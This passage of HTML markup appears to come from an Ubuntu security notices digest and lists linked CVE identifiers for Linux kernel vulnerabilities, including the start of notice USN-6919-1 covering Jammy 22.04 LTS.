<li><a href="https://ubuntu.com/security/CVE-2024-35878">CVE-2024-35878</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35954">CVE-2024-35954</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26998">CVE-2024-26998</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36024">CVE-2024-36024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26936">CVE-2024-26936</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27018">CVE-2024-27018</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35900">CVE-2024-35900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35940">CVE-2024-35940</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35985">CVE-2024-35985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35944">CVE-2024-35944</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35958">CVE-2024-35958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35864">CVE-2024-35864</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35975">CVE-2024-35975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27002">CVE-2024-27002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36018">CVE-2024-36018</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35974">CVE-2024-35974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26926">CVE-2024-26926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35877">CVE-2024-35877</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35916">CVE-2024-35916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35934">CVE-2024-35934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35930">CVE-2024-35930</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35898">CVE-2024-35898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35893">CVE-2024-35893</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35887">CVE-2024-35887</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35929">CVE-2024-35929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26923">CVE-2024-26923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35911">CVE-2024-35911</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35919">CVE-2024-35919</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26984">CVE-2024-26984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27016">CVE-2024-27016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35926">CVE-2024-35926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35872">CVE-2024-35872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35922">CVE-2024-35922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27007">CVE-2024-27007</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35931">CVE-2024-35931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36021">CVE-2024-36021</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35953">CVE-2024-35953</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27004">CVE-2024-27004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27001">CVE-2024-27001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27014">CVE-2024-27014</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35866">CVE-2024-35866</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27021">CVE-2024-27021</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35870">CVE-2024-35870</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35925">CVE-2024-35925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35891">CVE-2024-35891</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26982">CVE-2024-26982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35879">CVE-2024-35879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35979">CVE-2024-35979</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35912">CVE-2024-35912</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35982">CVE-2024-35982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27015">CVE-2024-27015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26985">CVE-2024-26985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35861">CVE-2024-35861</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35939">CVE-2024-35939</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27003">CVE-2024-27003</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35945">CVE-2024-35945</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35967">CVE-2024-35967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35966">CVE-2024-35966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26983">CVE-2024-26983</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35894">CVE-2024-35894</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35896">CVE-2024-35896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36027">CVE-2024-36027</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35895">CVE-2024-35895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26987">CVE-2024-26987</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35873">CVE-2024-35873</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26996">CVE-2024-26996</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26991">CVE-2024-26991</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27013">CVE-2024-27013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36026">CVE-2024-36026</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26922">CVE-2024-26922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35897">CVE-2024-35897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35917">CVE-2024-35917</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35968">CVE-2024-35968</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35890">CVE-2024-35890</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35904">CVE-2024-35904</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35867">CVE-2024-35867</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35933">CVE-2024-35933</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35918">CVE-2024-35918</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35920">CVE-2024-35920</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26997">CVE-2024-26997</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35981">CVE-2024-35981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35963">CVE-2024-35963</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26989">CVE-2024-26989</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26999">CVE-2024-26999</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35892">CVE-2024-35892</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27010">CVE-2024-27010</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26992">CVE-2024-26992</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35935">CVE-2024-35935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27022">CVE-2024-27022</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35971">CVE-2024-35971</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35956">CVE-2024-35956</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35862">CVE-2024-35862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35969">CVE-2024-35969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27012">CVE-2024-27012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26990">CVE-2024-26990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35885">CVE-2024-35885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26925">CVE-2024-26925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35905">CVE-2024-35905</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35914">CVE-2024-35914</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35884">CVE-2024-35884</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35927">CVE-2024-35927</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35882">CVE-2024-35882</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26980">CVE-2024-26980</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35964">CVE-2024-35964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35955">CVE-2024-35955</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27020">CVE-2024-27020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35980">CVE-2024-35980</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35903">CVE-2024-35903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35976">CVE-2024-35976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35886">CVE-2024-35886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35883">CVE-2024-35883</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35959">CVE-2024-35959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35915">CVE-2024-35915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35880">CVE-2024-35880</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27000">CVE-2024-27000</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35938">CVE-2024-35938</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35869">CVE-2024-35869</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36023">CVE-2024-36023</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26988">CVE-2024-26988</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.8 - Oracle</li>
</ul>
<h3 id="usn-6919-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6919-1">USN-6919-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>304 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-35976">CVE-2024-35976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52880">CVE-2023-52880</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35849">CVE-2024-35849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27073">CVE-2024-27073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35934">CVE-2024-35934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27038">CVE-2024-27038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26973">CVE-2024-26973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35853">CVE-2024-35853</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27047">CVE-2024-27047</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36007">CVE-2024-36007</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27024">CVE-2024-27024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26750">CVE-2024-26750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26833">CVE-2024-26833</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26960">CVE-2024-26960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26929">CVE-2024-26929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52488">CVE-2023-52488</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27417">CVE-2024-27417</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26922">CVE-2024-26922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26863">CVE-2024-26863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35890">CVE-2024-35890</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27015">CVE-2024-27015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27395">CVE-2024-27395</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26779">CVE-2024-26779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27419">CVE-2024-27419</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27013">CVE-2024-27013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26981">CVE-2024-26981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26798">CVE-2024-26798</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26895">CVE-2024-26895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35922">CVE-2024-35922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52699">CVE-2023-52699</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26883">CVE-2024-26883</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35871">CVE-2024-35871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27410">CVE-2024-27410</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26884">CVE-2024-26884</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26885">CVE-2024-26885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27074">CVE-2024-27074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26751">CVE-2024-26751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26857">CVE-2024-26857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26848">CVE-2024-26848</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26901">CVE-2024-26901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35844">CVE-2024-35844</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35809">CVE-2024-35809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26687">CVE-2024-26687</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35988">CVE-2024-35988</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26835">CVE-2024-26835</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26764">CVE-2024-26764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27020">CVE-2024-27020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35907">CVE-2024-35907</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35886">CVE-2024-35886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27077">CVE-2024-27077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26787">CVE-2024-26787</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26950">CVE-2024-26950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26974">CVE-2024-26974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35905">CVE-2024-35905</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27008">CVE-2024-27008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26744">CVE-2024-26744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35935">CVE-2024-35935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26988">CVE-2024-26988</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26748">CVE-2024-26748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26776">CVE-2024-26776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26907">CVE-2024-26907</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27053">CVE-2024-27053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35970">CVE-2024-35970</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35950">CVE-2024-35950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35854">CVE-2024-35854</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35822">CVE-2024-35822</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26961">CVE-2024-26961</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26733">CVE-2024-26733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26773">CVE-2024-26773</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27390">CVE-2024-27390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35888">CVE-2024-35888</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36029">CVE-2024-36029</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26643">CVE-2024-26643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35821">CVE-2024-35821</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35819">CVE-2024-35819</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26809">CVE-2024-26809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35984">CVE-2024-35984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26851">CVE-2024-26851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35940">CVE-2024-35940</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26654">CVE-2024-26654</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35910">CVE-2024-35910</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26891">CVE-2024-26891</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26793">CVE-2024-26793</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35938">CVE-2024-35938</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26736">CVE-2024-26736</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26583">CVE-2024-26583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26870">CVE-2024-26870</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35828">CVE-2024-35828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35885">CVE-2024-35885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35958">CVE-2024-35958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26889">CVE-2024-26889</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35899">CVE-2024-35899</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26839">CVE-2024-26839</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26894">CVE-2024-26894</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26937">CVE-2024-26937</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35925">CVE-2024-35925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35933">CVE-2024-35933</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26771">CVE-2024-26771</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26923">CVE-2024-26923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26852">CVE-2024-26852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26924">CVE-2024-26924</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26872">CVE-2024-26872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26774">CVE-2024-26774</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35930">CVE-2024-35930</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27065">CVE-2024-27065</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26993">CVE-2024-26993</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27034">CVE-2024-27034</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36020">CVE-2024-36020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26802">CVE-2024-26802</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26976">CVE-2024-26976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48808">CVE-2022-48808</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35847">CVE-2024-35847</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26996">CVE-2024-26996</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36025">CVE-2024-36025</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52652">CVE-2023-52652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27403">CVE-2024-27403</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52447">CVE-2023-52447</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27037">CVE-2024-27037</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27413">CVE-2024-27413</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26749">CVE-2024-26749</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26956">CVE-2024-26956</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26958">CVE-2024-26958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26754">CVE-2024-26754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26812">CVE-2024-26812</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26772">CVE-2024-26772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27436">CVE-2024-27436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27437">CVE-2024-27437</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35912">CVE-2024-35912</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35805">CVE-2024-35805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26845">CVE-2024-26845</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35990">CVE-2024-35990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35791">CVE-2024-35791</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26906">CVE-2024-26906</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27039">CVE-2024-27039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26915">CVE-2024-26915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26970">CVE-2024-26970</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26782">CVE-2024-26782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26813">CVE-2024-26813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52645">CVE-2023-52645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26935">CVE-2024-26935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27076">CVE-2024-27076</a> <!-- raw HTML omitted --></li>
